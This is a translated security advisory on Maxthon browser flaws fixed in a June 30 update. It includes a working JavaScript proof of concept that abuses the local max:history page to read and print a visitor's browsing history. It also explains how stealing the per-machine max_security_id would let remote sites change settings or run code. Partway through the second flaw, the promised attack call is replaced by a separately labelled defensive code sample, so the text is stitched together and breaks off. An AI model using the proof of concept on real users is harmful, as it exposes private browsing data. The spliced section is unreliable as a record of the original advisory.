After 80sec's advisory on the Maxthon vulnerabilities became public, Maxthon released a browser update on 6.30 (June 30) that fixes the vulnerabilities mentioned there; the details of the update can be found at http://blog.maxthon.cn/. This update fixes three security problems. The main ones are described below:
Vulnerability source: http://www.80sec.com/release/maxthon-vulns-poc.txt
1. Browser-engine vulnerability leads to a local cross-domain vulnerability
Vulnerability description: Maxthon uses the system's IE engine, and that engine may contain security flaws that allow cross-domain attacks. In Maxthon, the max: scheme (and similar internal schemes) is treated locally as equivalent to file://, so such a cross-domain attack results in JavaScript executing in the local context. Only a POC that reads the browsing history is given here.
Vulnerability POC:
<a href="">Maxthon Exploit</a>
<script>
function win() {
  // Open the internal max:history page, which runs in the local context
  x = window.open("max:history");
  // Once it has loaded, run script in that window that reads the history list
  // and writes each visited site into the page
  setTimeout(function() {
    x.location = new String("javascript:x=maxHistory.history.list.site.loadData(); for (i=0; i<x.length; i++) document.write(x[i].site + \"<br>\");");
  }, 3000);
}
window.onload = function() {
  // Point every link on the page at the win() function
  for (i = 0; i < document.links.length; i++) {
    document.links[i].href = "javascript:win()";
  }
};
</script>
Vulnerability fix: Even before the IE engine itself is patched, the new Maxthon version already fixes this vulnerability.
2. Maxthon Security Center vulnerability allows remote modification of arbitrary user settings
Vulnerability description: Maxthon does not fully account for certain characteristics of the IE engine, which leads to a vulnerability when some unusual situations are handled. Maxthon's control center is in fact a set of HTML+JavaScript pages; through these pages one can read sensitive data, modify browser settings, download files, and so on. Of course, Maxthon also has its own security policy: these HTML pages cannot be invoked directly from an external site, because Maxthon has a security control script, security.src, whose code is as follows:
var max_security_id = '';
var url = String(document.location).toLowerCase();
if (url.indexOf('file://') > -1 && url.indexOf('http://') == -1 && url.indexOf('https://') == -1) {
  max_security_id = '{B73B3AC9-B009-4429-AE67-514332D791FE}';
} else {
  document.location = 'about:blank';
}
max_security_id is a parameter that Maxthon requires whenever it invokes one of its controls; it is mandatory in every function, and each machine's max_security_id is different. If we can obtain this max_security_id, then every function Maxthon exposes could be invoked from an arbitrary remote site: changing settings, reading sensitive data, or even remote code execution.
First, this max_security_id appears to change every time the browser starts, and it is saved under the installation directory in template/security.src. But we can make the following call from a page on our own site:
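The security.src check above decides by searching for scheme-like substrings anywhere in the URL string rather than by looking at the URL's actual scheme, so it can disagree with the parsed scheme; a local page whose query string happens to contain "http://", for instance, is sent to about:blank. The following is an added example, not code from the page or from Maxthon: weakCheck reproduces the substring logic of security.src, strictCheck decides on the parsed protocol instead, and the sample URLs (including the placeholder file path) are constructed for illustration.

```javascript
// Added example: the substring-based allow check from security.src, as
// quoted above, beside a check that looks only at the parsed scheme.
// All sample URLs below are constructed; the file path is a placeholder.

// Reproduces the logic of security.src: allow when the lowercased URL string
// contains "file://" and contains neither "http://" nor "https://".
function weakCheck(urlString) {
  const url = String(urlString).toLowerCase();
  return url.indexOf('file://') > -1 &&
         url.indexOf('http://') === -1 &&
         url.indexOf('https://') === -1;
}

// Decides on the parsed scheme only; input that does not parse is rejected.
function strictCheck(urlString) {
  let parsed;
  try {
    parsed = new URL(String(urlString));
  } catch (e) {
    return false;
  }
  return parsed.protocol === 'file:';
}

// Constructed samples (placeholder paths, example.test hosts).
const SAMPLES = [
  'file:///C:/placeholder/template/security.src',
  'file:///C:/placeholder/page.htm?next=http://example.test/',
  'http://example.test/',
  'HTTPS://EXAMPLE.TEST/',
  'about:blank',
  'max:history',
  'not a url',
];

// Runs both checks on one URL and reports the two verdicts side by side.
function evaluate(urlString) {
  return {
    url: urlString,
    weak: weakCheck(urlString),
    strict: strictCheck(urlString),
  };
}

function evaluateAll() {
  return SAMPLES.map(evaluate);
}

for (const r of evaluateAll()) {
  const w = r.weak ? 'allow' : 'deny ';
  const s = r.strict ? 'allow' : 'deny ';
  console.log(`${w} (substring)  ${s} (scheme)  ${r.url}`);
}
```

The second sample shows the disagreement: the substring check denies a genuine local file because "http://" appears in its query string, while the scheme check allows it. A check that gates access to privileged pages should reason about the parsed origin, not about substrings of the URL text.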